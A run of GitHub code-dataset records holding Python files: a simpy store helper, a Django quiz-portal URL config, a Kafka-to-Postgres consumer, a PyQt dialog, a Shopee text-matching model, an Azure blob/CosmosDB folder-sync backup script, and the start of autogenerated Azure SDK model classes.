print('Cumulated Avg: %f' % self.avg_value)\n\n\nclass MonitoredFilterStore(simpy.FilterStore, MonitoredStore):\n def __init__(self, env, capacity=float('inf')):\n super(MonitoredFilterStore, self).__init__(env, capacity)\n\n self._last_value = len(self.items)\n self._cumulative_item_rec = []\n self._cumulative_time_rec = []\n\n self.reset_tracking()\n\n # simpy.FilterStore._do_get method override\n def _do_get(self, event):\n for item in self.items:\n if event.filter(item):\n self.items.remove(item)\n event.succeed(item)\n break\n\n self._update_tracking()\n\n return True\n\n\nif __name__ == '__main__':\n q = MonitoredStore(simpy.Environment())\n q.print_stats()\n\n p = MonitoredFilterStore(simpy.Environment())\n p.print_stats()\n","repo_name":"JeremyBYU/uas-package","sub_path":"simuas/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36805762243","text":"\"\"\"svportal URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf.urls import url,include\nfrom django.contrib.auth import logout\nfrom django.urls import path,re_path\nfrom svapp.views import (QuizListView,StudentInterestsView,TakenQuizListView,QuizResultsView,\n QuizChangeListView,QuizCreateView,QuizUpdateView,QuizDeleteView,QuizTeacherResultsView,QuestionDeleteView,\n AddQuestionsView)\nfrom svapp import views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.index),\n url(r'^index/$', views.index),\n url(r'^adm/$', views.adm),\n url(r'^student/$', views.student),\n url(r'^teacher/$', views.teacher),\n url(r'^treg/',views.teacher_reg),\n url(r'^tlog/',views.teacher_log),\n url(r'^sreg/',views.student_reg),\n url(r'^slog/', views.student_log),\n url(r'^log/', views.login),\n url(r'^logout/$',views.logout_view),\n url(r'^adds/',views.add_student),\n url(r'^addt/',views.add_teacher),\n url(r'^comment/',views.User_comment_view),\n url(r'^com/',views.Student_comment_view),\n url(r'^comments/',views.comments),\n url(r'^show/', views.show),\n url(r'^sdetails/',views.sdetails),\n url(r'^tdetails/',views.tdetails),\n url(r'^subdetails/', views.subject_details),\n url(r'^subdelete/(?P\\d+)/', views.subject_delete),\n url(r'^subupdate/(?P\\d+)/', views.subject_update),\n url(r'^dels/(?P\\d+)/', views.delete_s),\n url(r'^delt/(?P\\d+)/', views.delete_t),\n url(r'^delc/(?P\\d+)/', views.delete_c),\n url(r'^delsc/(?P\\d+)/', views.delete_sc),\n url(r'^ups/(?P\\d+)/',views.StudentUpdate),\n url(r'^update_s/(?P\\d+)/',views.S_Update),\n url(r'^update_t/(?P\\d+)/',views.T_Update),\n url(r'^upt/(?P\\d+)/',views.TeacherUpdate),\n url(r'^search_s/',views.Search_Student),\n url(r'^search_t/',views.Search_Teacher),\n url(r'^search_a/',views.Search_Assessments),\n url(r'^search_q/',views.Search_Quiz),\n url(r'^easy/',views.easy),\n url(r'^medium/',views.medium),\n url(r'^hard/',views.hard),\n url(r'^write/', views.write),\n path('accounts/', include('django.contrib.auth.urls')),\n url(r'^addprofile/(?P\\d+)/',views.ProfileUpdate, name='addprofile'),\n url(r'^quiz_list/',QuizListView.as_view(), name='quiz_list'),\n url(r'^interests/',StudentInterestsView.as_view(), name='student_interests'),\n url(r'^taken/', TakenQuizListView.as_view(), name='taken_quiz_list'),\n url(r'^quiztake/(?P\\d+)/$', views.take_quiz, name='take_quiz'),\n url(r'^quiz/(?P\\d+)/studentresults/$', QuizResultsView.as_view(), name='student_quiz_results'),\n\n url(r'^quiz_change_list/', QuizChangeListView.as_view(), name='quiz_change_list'),\n url(r'^quiz/add/', QuizCreateView.as_view(), name='quiz_add'),\n url(r'^quiz/(?P\\d+)/$', QuizUpdateView.as_view(), name='quiz_change'),\n url(r'^quiz/(?P\\d+)/delete/$', QuizDeleteView.as_view(), name='quiz_delete'),\n url(r'^quiz/(?P\\d+)/results/$', QuizTeacherResultsView.as_view(), name='quiz_results'),\n url(r'^quiz/(?P\\d+)/question/add/$', views.question_add, name='question_add'),\n url(r'^quiz/(?P\\d+)/question/(?P\\d+)/$', views.question_change, name='question_change'),\n url(r'^quiz/(?P\\d+)/question/(?P\\d+)/delete/$', QuestionDeleteView.as_view(), name='question_delete'),\n\n url(r'^addquestions/', AddQuestionsView.as_view(), name='addquestions'),\n url(r'^addsubjects/',views.subject_add, name='addsubjects'),\n url(r'^qdelete/(?P.*)/',views.question_delete, name='q_delete'),\n\n] +static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"abeedshaik786/kishore_task1","sub_path":"svportal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"837672772","text":"import os\n\nfrom classes.PostgresPC import PostgresPC\n\nenv_vars = {\n \"config_path\": os.getenv(\"config_path\"),\n \"config_section\": os.getenv(\"config_section\"),\n}\n\nnew_c = PostgresPC(**env_vars)\n\nsql = \"INSERT INTO twitter_users(user_id, user_name, user_location, account_created_at, statuses_count, favorites_count,\\\n followers_count, friends_count, verified) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)\\\n ON CONFLICT (user_id) DO NOTHING;\"\n\ntry:\n while True:\n msg = new_c.consumer.poll(0.1)\n\n if msg is None:\n continue\n\n elif msg.error() is not None:\n print(f\"Error occured: {str(msg.error())}\")\n\n else:\n new_user = new_c.decode_msg(msg)\n print(f\"Received user:\\n{new_user}\")\n\n row_values = (\n new_user[\"id_str\"],\n new_user[\"user_name\"],\n new_user[\"user_location\"],\n new_user[\"account_created_at\"],\n new_user[\"statuses_count\"],\n new_user[\"favorites_count\"],\n new_user[\"followers_count\"],\n new_user[\"friends_count\"],\n new_user[\"verified\"],\n )\n\n try:\n new_c.execute_statement(sql, row_values)\n print(\"Persisted user to DB\")\n except Exception as e:\n print(f\"Exception: {e}\")\n\nexcept KeyboardInterrupt:\n pass\n\nfinally:\n new_c.consumer.close()\n","repo_name":"janstrohschein/KOARCH","sub_path":"Big_Data_Platform/Docker/DB/Postgres/src/1c_persist_to_postgres.py","file_name":"1c_persist_to_postgres.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"39812749154","text":"# -*- coding: utf-8 -*-\nfrom PyQt5 import QtWidgets\nfrom sys import platform as _platform\n\nclass AddBatchlocationDialog(QtWidgets.QDialog):\n def __init__(self, parent):\n super(QtWidgets.QDialog, self).__init__(parent)\n # create dialog screen for each parameter in curr_params\n \n self.parent = parent\n self.view = self.parent.batchlocations_view \n self.model = self.parent.batchlocations_model\n self.batchlocations = self.parent.tools_widget.batchlocations\n self.locationgroups = self.parent.tools_widget.locationgroups\n self.statusbar = self.parent.statusBar() \n \n self.append_mode = False\n parent_type = None\n self.child_item = False\n self.row = False\n \n if (not len(self.view.selectedIndexes())):\n # if nothing selected\n self.append_mode = True \n elif (self.view.selectedIndexes()[0].parent().row() == -1):\n # if parent row is selected\n self.row = self.view.selectedIndexes()[0].row()\n self.index = None\n parent_type = self.batchlocations[self.locationgroups[self.row][0]][0]\n else:\n self.row = self.view.selectedIndexes()[0].parent().row()\n self.index = self.view.selectedIndexes()[0].row()\n parent_type = self.batchlocations[self.locationgroups[self.row][self.index]][0]\n self.child_item = True\n \n self.setWindowTitle(self.tr(\"Add batch location\"))\n\n vbox = QtWidgets.QVBoxLayout()\n hbox0 = QtWidgets.QHBoxLayout()\n\n label = QtWidgets.QLabel(self.tr(\"Select type:\"))\n hbox0.addWidget(label)\n\n batchlocation_types = []\n batchlocation_types.append(\"BatchClean\") \n batchlocation_types.append(\"BatchTex\")\n batchlocation_types.append(\"Buffer\") \n #batchlocation_types.append(\"InlinePECVD\")\n batchlocation_types.append(\"IonImplanter\") \n batchlocation_types.append(\"PlasmaEtcher\")\n batchlocation_types.append(\"PrintLine\") \n batchlocation_types.append(\"SingleSideEtch\") \n #batchlocation_types.append(\"SpatialALD\")\n batchlocation_types.append(\"TubeFurnace\")\n batchlocation_types.append(\"TubePECVD\")\n batchlocation_types.append(\"WaferBin\")\n batchlocation_types.append(\"WaferSource\")\n batchlocation_types.append(\"WaferStacker\") \n batchlocation_types.append(\"WaferUnstacker\") \n\n self.batchlocation_types_combo = QtWidgets.QComboBox(self)\n for i in batchlocation_types:\n self.batchlocation_types_combo.addItem(i)\n\n if (parent_type):\n for i, value in enumerate(batchlocation_types):\n if (parent_type == value):\n self.batchlocation_types_combo.setCurrentIndex(i)\n continue\n\n hbox0.addWidget(self.batchlocation_types_combo)\n vbox.addLayout(hbox0)\n\n hbox1 = QtWidgets.QHBoxLayout()\n \n label = QtWidgets.QLabel(self.tr(\"name\"))\n hbox1.addWidget(label)\n\n self.name_edit = QtWidgets.QLineEdit(\"new\")\n hbox1.addWidget(self.name_edit) \n\n if (self.child_item):\n hbox2 = QtWidgets.QHBoxLayout()\n \n label = QtWidgets.QLabel(self.tr(\"create_copy\"))\n hbox2.addWidget(label)\n\n self.copy_checkbox = QtWidgets.QCheckBox()\n self.copy_checkbox.setChecked(True)\n hbox2.addWidget(self.copy_checkbox) \n\n ### Buttonbox for ok or cancel ###\n buttonbox = QtWidgets.QDialogButtonBox(QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel)\n buttonbox.accepted.connect(self.read)\n buttonbox.rejected.connect(self.reject)\n if _platform == \"linux\" or _platform == \"linux2\":\n buttonbox.layout().setDirection(QtWidgets.QBoxLayout.RightToLeft) \n \n vbox.addLayout(hbox1)\n if (self.child_item): vbox.addLayout(hbox2)\n vbox.addWidget(buttonbox)\n\n self.setLayout(vbox) \n\n def read(self):\n \n reindex_locationgroups = self.parent.tools_widget.reindex_locationgroups\n load_definition = self.parent.tools_widget.load_definition\n generate_batchconnections = self.parent.tools_widget.generate_batchconnections\n reset_cassetteloops = self.parent.cassetteloops_widget.reset_cassetteloops\n reset_operators = self.parent.operators_widget.reset_operators\n reset_technicians = self.parent.technicians_widget.reset_technicians\n\n if (self.append_mode): # if nothing was selected\n self.selected_batchlocation_number = len(self.batchlocations)\n reset_cassetteloops(self.selected_batchlocation_number)\n reset_operators(self.selected_batchlocation_number)\n reset_technicians(self.selected_batchlocation_number) \n self.locationgroups.append([0])\n self.row = len(self.locationgroups)-1\n elif (self.index == None): # if parent item was selected \n self.selected_batchlocation_number = self.locationgroups[self.row][0]\n reset_cassetteloops(self.selected_batchlocation_number)\n reset_operators(self.selected_batchlocation_number)\n reset_technicians(self.selected_batchlocation_number) \n self.locationgroups.insert(self.row,[0]) \n else: # if child item was selected \n self.selected_batchlocation_number = self.locationgroups[self.row][self.index]\n reset_cassetteloops(self.selected_batchlocation_number)\n reset_operators(self.selected_batchlocation_number)\n reset_technicians(self.selected_batchlocation_number) \n self.locationgroups[self.row].insert(self.index,0) \n\n new_dict = {}\n if (self.child_item): # copy previously selected batchlocation\n if (self.copy_checkbox.isChecked()): # if user selected this option\n new_dict.update(self.batchlocations[self.locationgroups[self.row][self.index+1]][1])\n\n # insert new batch location with selected name\n input_string = str(self.name_edit.text()) \n new_dict.update({'name' : input_string})\n self.batchlocations.insert(self.selected_batchlocation_number,\n [self.batchlocation_types_combo.currentText(), new_dict])\n \n # do a bit of housekeeping, now that batchlocations has changed\n reindex_locationgroups()\n load_definition(False)\n generate_batchconnections() # generate new connections list\n\n # re-expand parent item in view \n index = self.model.index(self.row, 0)\n self.view.setExpanded(index, True)\n \n if (self.child_item): # select newly created item in view\n parent = self.model.index(self.row, 0)\n index = self.model.index(self.index, 0, parent)\n self.view.setCurrentIndex(index)\n \n self.statusbar.showMessage(self.tr(\"Batch location added\"),3000)\n self.accept()","repo_name":"slierp/Discrete-event-simulation-for-solar-cell-production","sub_path":"desc-pro/dialogs/AddBatchlocationDialog.py","file_name":"AddBatchlocationDialog.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"2599221898","text":"import torch.nn as nn\nimport transformers\n\nfrom .head import AdaCos, ArcFace, CosFace\n\n\nclass ShopeeTextModel(nn.Module):\n def __init__(\n self,\n n_classes,\n device,\n model_name=\"bert-base-uncased\",\n pooling=\"mean_pooling\",\n use_fc=False,\n fc_dim=512,\n dropout=0.0,\n loss_module=\"softmax\",\n s=30.0,\n margin=0.50,\n ls_eps=0.0,\n theta_zero=0.785,\n ):\n \"\"\"\n :param n_classes:\n :param model_name: name of model from pretrainedmodels\n e.g. resnet50, resnext101_32x4d, pnasnet5large\n :param pooling: One of ('SPoC', 'MAC', 'RMAC', 'GeM', 'Rpool', 'Flatten', 'CompactBilinearPooling')\n :param loss_module: One of ('arcface', 'cosface', 'softmax')\n \"\"\"\n super(ShopeeTextModel, self).__init__()\n\n self.transformer = transformers.AutoModel.from_pretrained(model_name)\n self.final_in_features = self.transformer.config.hidden_size\n\n self.pooling = pooling\n self.use_fc = use_fc\n\n if use_fc:\n self.dropout = nn.Dropout(p=dropout)\n self.fc = nn.Linear(self.final_in_features, fc_dim)\n self.bn = nn.BatchNorm1d(fc_dim)\n self.relu = nn.ReLU()\n self._init_params()\n self.final_in_features = fc_dim\n\n self.loss_module = loss_module\n if loss_module == \"arcface\":\n self.final = ArcFace(\n self.final_in_features,\n n_classes,\n s=s,\n m=margin,\n easy_margin=False,\n ls_eps=ls_eps,\n device=device,\n )\n elif loss_module == \"cosface\":\n self.final = CosFace(\n self.final_in_features, n_classes, s=s, m=margin, device=device\n )\n elif loss_module == \"adacos\":\n self.final = AdaCos(\n self.final_in_features, n_classes, m=margin, theta_zero=theta_zero\n )\n else:\n self.final = nn.Linear(self.final_in_features, n_classes)\n\n def _init_params(self):\n nn.init.xavier_normal_(self.fc.weight)\n nn.init.constant_(self.fc.bias, 0)\n nn.init.constant_(self.bn.weight, 1)\n nn.init.constant_(self.bn.bias, 0)\n\n def forward(self, input_ids, attention_mask, label):\n feature = self.extract_features(input_ids, attention_mask)\n if self.loss_module == \"arcface\":\n logits = self.final(feature, label)\n else:\n logits = self.final(feature)\n return logits\n\n def extract_features(self, input_ids, attention_mask):\n x = self.transformer(input_ids=input_ids, attention_mask=attention_mask)\n\n features = x[0]\n features = features[:, 0, :]\n\n if self.use_fc:\n features = self.fc(features)\n features = self.bn(features)\n features = self.relu(features)\n features = self.dropout(features)\n return features\n","repo_name":"mammadliafaq/master-thesis_web-app","sub_path":"app/models/text_model.py","file_name":"text_model.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27935000481","text":"import os, time, json\nfrom config import config\nfrom log import setup_logger\nfrom azStorage import AZBlobStorage\nfrom azCosmosContainer import AzCosmosContainer\n\nlogger=setup_logger(__name__)\n\nclass FileTracker:\n \"\"\"Tracks assigned folder for add, delete, and file changes. \n When detected executes upload to AZ Storage and places a record of files in CosmosDB of blob storage.\n \"\"\"\n def __init__(self, \n working_dir: str, t_sec: str, conn_str: str, sto_container: str, \n db_name: str, uri: str, key: str, db_container: str\n ):\n \"\"\"Constructs all the necessary attributes: FileTracker object.\n\n Args:\n working_dir (str): Example: 'c:\\\\Users\\\\User123\\\\backup-folder'\n t_sec (str): time in seconds\n conn_str (str): Azure Blob Storage Connection String\n sto_container (str): Storage Actual Name\n db_name (str): Database Name in Azure CosmosDB\n uri (str): URI for CosmosDB connection\n key (str): Unique Key as Per Azure Acct.\n db_container (str): CosmosDB Actual Name\n \"\"\"\n self.working_dir = working_dir\n self.t_sec = int(t_sec) \n self.record_name = 'after-before-record.txt'\n \n # Blob Storage\n self.sto_container = sto_container\n self.conn_str = conn_str\n self.storage_resource = AZBlobStorage(\n working_dir=self.working_dir,conn_str=self.conn_str, \n container=self.sto_container)\n \n # File Track DB\n self.db_name = db_name\n self.uri = uri\n self.key = key\n self.db_container = db_container\n self.db_resource = AzCosmosContainer(\n uri=self.uri, key=self.key, \n database_name=self.db_name, container_name=self.db_container)\n self.db_load = self.db_resource.create_load_db\n self.db_container = self.db_resource.create_load_container\n \n \n @property \n def file_list(self) -> list:\n \"\"\"Creates a list of all files.\n Lists: Pwd and Sub-folder files, including hidden. \n \n Returns:\n list: A list of path/file_name for working_dir\n \"\"\"\n return [os.path.join(dirpath, file).replace(self.working_dir, \"\") for (\n dirpath, dirnames, filenames) in os.walk(self.working_dir) for file in filenames]\n \n \n @property\n def file_time_list(self) -> dict:\n \"\"\"Creates a Dictionary of filenames as key and os time for values\n\n Returns:\n dict: {\"path/filename\": float}\n \"\"\"\n file_list = self.file_list\n time_list = [os.path.getmtime(self.working_dir+file) for file in file_list]\n \n return dict(zip(file_list, time_list))\n \n \n def file_select_times(self, file_list: list, after_local: dict) ->dict:\n \"\"\"Updates after_local dictionary items\n\n Args:\n file_list (list): List of files [\"path/filename\"]\n after_local (dict): Existing file time list\n\n Returns:\n dict: Updated after_local\n \"\"\"\n time_list = [os.path.getmtime(self.working_dir+file) for file in file_list]\n update_after = dict(zip(file_list, time_list))\n after_local.update(update_after)\n\n return after_local\n \n \n @property\n def before_save_local(self) -> dict:\n \"\"\"Loads file name self.record_name\n\n Returns:\n dict: {\"filename\": filetime}\n \"\"\"\n try: \n with open(self.record_name, 'r') as data:\n out = json.loads(data.read())\n\n except Exception as err:\n logger.error(\"Failed: %s Issue:\" % err)\n\n return out\n \n \n def after_save_local(self, save:dict) ->None:\n \"\"\"Saves self.record_name\n\n Args:\n save (dict): {\"filename\": filetime}\n \"\"\"\n record = json.dumps(save)\n try:\n with open(self.record_name, 'w') as data:\n data.write(record)\n\n except Exception as err:\n logger.error(\"Failed: %s Issue\" % err)\n \n \n def delete_files(self, file_list:dict) ->None: \n \"\"\"Deletes Local Files.\n\n Args:\n file_list (dict): {\"filename\": filetime}\n \"\"\"\n for file in file_list:\n\n # Format path\n file_path = os.path.join(self.working_dir, file)\n # If file exists, delete it.\n if os.path.isfile(path=file_path):\n os.remove(path=file_path)\n logger.info(\"Success: %s file removed\" % file_path)\n \n else:\n # If it fails, inform the user.\n logger.error(\"Error: %s file not found\" % file_path)\n\n # Remove DIR \n folder_path = file_path.replace(os.path.basename(file_path), '')\n if len(os.listdir(path=folder_path)) == 0:\n os.rmdir(path=folder_path, dir_fd = None)\n logger.info(\"Success: %s folder removed\" % folder_path)\n \n \n @property\n def backup_svc(self) ->None:\n \"\"\"Compares the state of the files from the last time the script was run, \n and compares it with the current state of the files to detect changes, \n ensuring that the files in the cloud storage \n and the files in the local storage are always in sync.\n \"\"\"\n before_local = self.before_save_local\n after_local = self.file_time_list\n \n logger.info(\"Scanning DB for Cloud Changes\")\n before_cloud = self.db_resource.scan_all_items\n after_cloud = self.storage_resource.blob_file_time_list \n \n print('-----------------------------------------------------------------------------------')\n logger.info(f\"Local Directory file count before: {len(before_local)}\")\n \n file_time_added_cloud = {key: value for key, value in after_cloud.items() if key not in before_cloud}\n file_time_removed_cloud = {key: value for key, value in before_cloud.items() if key not in after_cloud}\n file_time_changed_cloud = {key: value for key,value in after_cloud.items() if key in dict(\n set(before_cloud.items()) - set(after_cloud.items()))} \n \n file_time_added_local = {key: value for key, value in after_local.items() if key not in before_local} \n file_time_removed_local = {key: value for key, value in before_local.items() if key not in after_local} \n file_time_changed = {key: value for key,value in after_local.items() if key in dict(\n set(before_local.items()) - set(after_local.items()))} \n file_time_changed_local = {key: value for key,value in file_time_changed.items() if key not in file_time_changed_cloud}\n \n ###################################################\n # before_cloud vs after_cloud if Added\n if file_time_added_cloud:\n # Action: download from remote storage. For: Added\n logger.info(f\"|1| Cloud Added: Downloading: {file_time_added_cloud.keys()}\")\n # Function to download files from Cloud\n self.storage_resource.get_list(file_time_added_cloud.keys())\n # updates local record\n self.file_select_times(file_list=file_time_added_cloud.keys(), after_local=after_local)\n # Function to update DB\n db_cloud_add = self.storage_resource.blob_file_select_time_list(file_time_added_cloud.keys())\n self.db_resource.add_update_dictionary(db_cloud_add)\n ####################################################\n # Check to see what was removed by another client in cloud.\n if file_time_removed_cloud: \n # Action: remove file from: client\n logger.info(f\"|2| Cloud Removed: Deleting locally: {file_time_removed_cloud.keys()}\")\n # Function to Remove files from Folder in client\n self.delete_files(file_time_removed_cloud.keys())\n [after_local.pop(key) for key in file_time_removed_cloud.keys()]\n # Function to update DB\n self.db_resource.delete_item_list(file_time_removed_cloud.keys()) \n ####################################################\n # What existing files have changed in Cloud since last scan\n if file_time_changed_cloud:\n # Action: Download from Storage \n logger.info(f\"|3| Cloud Changed: {file_time_changed_cloud.keys()}\")\n # Function to add files from Storage\n self.storage_resource.get_list(file_time_changed_cloud.keys())\n # updates local record\n self.file_select_times(file_list=file_time_changed_cloud.keys(), after_local=after_local)\n # Function to update DB\n db_cloud_changed = self.storage_resource.blob_file_select_time_list(file_time_changed_cloud.keys())\n self.db_resource.add_update_dictionary(db_cloud_changed)\n ####################################################\n # files added to local \n if file_time_added_local:\n # Action: upload to cloud and update db\n logger.info(f\"|4| Local Added, Upload to Cloud: {file_time_added_local.keys()}\")\n # Function to Upload files to Storage\n self.storage_resource.put_list(file_time_added_local.keys())\n # Function to update DB with current values\n db_cloud_add = self.storage_resource.blob_file_select_time_list(file_time_added_local.keys())\n self.db_resource.add_update_dictionary(db_cloud_add) \n ####################################################\n # file removed from local\n if file_time_removed_local:\n # Action: Remove both object(s) from storage and Entry(s) from DB.\n logger.info(f\"|5| Local Removed.. Delete Cloud: {file_time_removed_local.keys()}\")\n # Function to Remove file for Remote Storage\n self.storage_resource.delete_list(file_time_removed_local.keys())\n # Function to Remove Entry from DB\n self.db_resource.delete_item_list(file_time_removed_local.keys())\n ####################################################\n # Existing file have changed in local.\n if file_time_changed_local:\n # Action update files to storage if files were not changed in storage.\n logger.info(f\"|6| Local Changed.. Update to Cloud: {file_time_changed_local.keys()}\")\n # Func to update to Storage\n self.storage_resource.put_list(file_time_changed_local.keys())\n # func to update DB\n db_cloud_changed = self.storage_resource.blob_file_select_time_list(file_time_changed_local.keys())\n self.db_resource.add_update_dictionary(db_cloud_changed)\n ####################################################\n else:\n print('-----------------------------------------------------------------------------------')\n logger.info(\"No Local or Cloud File Changes Detected..\")\n print('-----------------------------------------------------------------------------------')\n \n self.after_save_local(after_local) # Saves Changes to after_local\n \n logger.info(f'Local Directory file count after: {len(after_local)}')\n print('-----------------------------------------------------------------------------------')\n logger.info(f'All Done waiting:{self.t_sec} seconds.')\n time.sleep(self.t_sec)\n \n \nparams = config()\nmy_backup_folder = FileTracker(**params)\n\n#while True:\nfor i in range(50):\n \n print('--------------------------------------------------------------------------------------------------------------------')\n print('Run:', i)\n my_backup_folder.backup_svc\n print('--------------------------------------------------------------------------------------------------------------------')","repo_name":"bigtime007/azure-automated-file-backup","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39100254362","text":"import csv\n\nfrom SharedData.DictionaryData import DictionaryData\n\n\nclass ExportData(staticmethod):\n @staticmethod\n def export_pure_table_csv(path):\n with open(path, 'w', encoding='Shift-JIS', newline=\"\") as f:\n csv_writer = csv.writer(f)\n header = [\"单词\", \"词性\", \"释义\", \"例子\", \"音标\"]\n csv_writer.writerow(header)\n for word in DictionaryData.current_word_list:\n csv_writer.writerow(word.get_value()[:-1])","repo_name":"peler-little-pig/HaoCiKuaiJi","sub_path":"Lib/ExportData.py","file_name":"ExportData.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3559498102","text":"import datetime\nimport sys\nfrom typing import Any, Dict, List, Optional, TYPE_CHECKING, Union\n\nfrom .. import _serialization\n\nif sys.version_info >= (3, 9):\n from collections.abc import MutableMapping\nelse:\n from typing import MutableMapping # type: ignore # pylint: disable=ungrouped-imports\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from .. import models as _models\nJSON = MutableMapping[str, Any] # pylint: disable=unsubscriptable-object\n\n\nclass Resource(_serialization.Model):\n \"\"\"Common fields that are returned in the response for all Azure Resource Manager resources.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar id: Fully qualified resource ID for the resource. Ex -\n /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.\n :vartype id: str\n :ivar name: The name of the resource.\n :vartype name: str\n :ivar type: The type of the resource. E.g. \"Microsoft.Compute/virtualMachines\" or\n \"Microsoft.Storage/storageAccounts\".\n :vartype type: str\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n \"name\": {\"readonly\": True},\n \"type\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.id = None\n self.name = None\n self.type = None\n\n\nclass TrackedResource(Resource):\n \"\"\"The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar id: Fully qualified resource ID for the resource. Ex -\n /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.\n :vartype id: str\n :ivar name: The name of the resource.\n :vartype name: str\n :ivar type: The type of the resource. E.g. \"Microsoft.Compute/virtualMachines\" or\n \"Microsoft.Storage/storageAccounts\".\n :vartype type: str\n :ivar tags: Resource tags.\n :vartype tags: dict[str, str]\n :ivar location: The geo-location where the resource lives. Required.\n :vartype location: str\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n \"name\": {\"readonly\": True},\n \"type\": {\"readonly\": True},\n \"location\": {\"required\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n \"tags\": {\"key\": \"tags\", \"type\": \"{str}\"},\n \"location\": {\"key\": \"location\", \"type\": \"str\"},\n }\n\n def __init__(self, *, location: str, tags: Optional[Dict[str, str]] = None, **kwargs):\n \"\"\"\n :keyword tags: Resource tags.\n :paramtype tags: dict[str, str]\n :keyword location: The geo-location where the resource lives. Required.\n :paramtype location: str\n \"\"\"\n super().__init__(**kwargs)\n self.tags = tags\n self.location = location\n\n\nclass ConnectedCluster(TrackedResource): # pylint: disable=too-many-instance-attributes\n \"\"\"Represents a connected cluster.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar id: Fully qualified resource ID for the resource. Ex -\n /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.\n :vartype id: str\n :ivar name: The name of the resource.\n :vartype name: str\n :ivar type: The type of the resource. E.g. \"Microsoft.Compute/virtualMachines\" or\n \"Microsoft.Storage/storageAccounts\".\n :vartype type: str\n :ivar tags: Resource tags.\n :vartype tags: dict[str, str]\n :ivar location: The geo-location where the resource lives. Required.\n :vartype location: str\n :ivar identity: The identity of the connected cluster. Required.\n :vartype identity: ~azure.mgmt.hybridkubernetes.models.ConnectedClusterIdentity\n :ivar system_data: Metadata pertaining to creation and last modification of the resource.\n :vartype system_data: ~azure.mgmt.hybridkubernetes.models.SystemData\n :ivar agent_public_key_certificate: Base64 encoded public certificate used by the agent to do\n the initial handshake to the backend services in Azure. Required.\n :vartype agent_public_key_certificate: str\n :ivar kubernetes_version: The Kubernetes version of the connected cluster resource.\n :vartype kubernetes_version: str\n :ivar total_node_count: Number of nodes present in the connected cluster resource.\n :vartype total_node_count: int\n :ivar total_core_count: Number of CPU cores present in the connected cluster resource.\n :vartype total_core_count: int\n :ivar agent_version: Version of the agent running on the connected cluster resource.\n :vartype agent_version: str\n :ivar provisioning_state: Provisioning state of the connected cluster resource. Known values\n are: \"Succeeded\", \"Failed\", \"Canceled\", \"Provisioning\", \"Updating\", \"Deleting\", and \"Accepted\".\n :vartype provisioning_state: str or ~azure.mgmt.hybridkubernetes.models.ProvisioningState\n :ivar distribution: The Kubernetes distribution running on this connected cluster.\n :vartype distribution: str\n :ivar infrastructure: The infrastructure on which the Kubernetes cluster represented by this\n connected cluster is running on.\n :vartype infrastructure: str\n :ivar offering: Connected cluster offering.\n :vartype offering: str\n :ivar managed_identity_certificate_expiration_time: Expiration time of the managed identity\n certificate.\n :vartype managed_identity_certificate_expiration_time: ~datetime.datetime\n :ivar last_connectivity_time: Time representing the last instance when heart beat was received\n from the cluster.\n :vartype last_connectivity_time: ~datetime.datetime\n :ivar connectivity_status: Represents the connectivity status of the connected cluster. Known\n values are: \"Connecting\", \"Connected\", \"Offline\", and \"Expired\".\n :vartype connectivity_status: str 